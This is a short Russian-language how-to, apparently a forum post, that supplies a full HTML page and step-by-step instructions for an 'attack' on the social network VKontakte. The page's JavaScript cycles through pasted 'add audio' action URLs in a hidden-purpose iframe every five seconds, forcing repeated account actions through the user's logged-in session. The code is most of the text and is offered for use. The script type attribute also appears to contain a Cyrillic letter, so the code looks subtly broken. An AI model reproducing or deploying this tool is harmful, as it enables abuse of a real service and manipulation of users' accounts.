1. создаем html файл с таким содержанием:
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<meta http-equiv="Content" content="text/html; charset=utf-8">
<title>ПОПЯЧТС, УГ!</title>
</head><body linkifymax="0" linkifycurrent="0" linkifying="true">
<script type="text/javasсript">
line = 0;
function gsom()
{
var lines = document.getElementById('point').value.split("\n");
line = (line + 1) % lines.length;
document.getElementById('ifm').src = lines[line];
setTimeout("gsom();", 5000);
}
</script>
<p><textarea id="point" cols="100" rows="10"></textarea></p>
<p><iframe src="" id="ifm"></iframe></p>
<p><input value="GSOM" onclick="gsom();" type="button"></p>
</body></html>

2. сохраняем на компе.
3. открываем с браузера, в текстовое поле копируем ссылки типа http://vkontakte.ru/audio.php?act=add&add=1&... (добавить аудио - поиск по аудио - кнопка добавить - не нажимаем, а копируем ссылку)

3. жмем GSOM - атака началась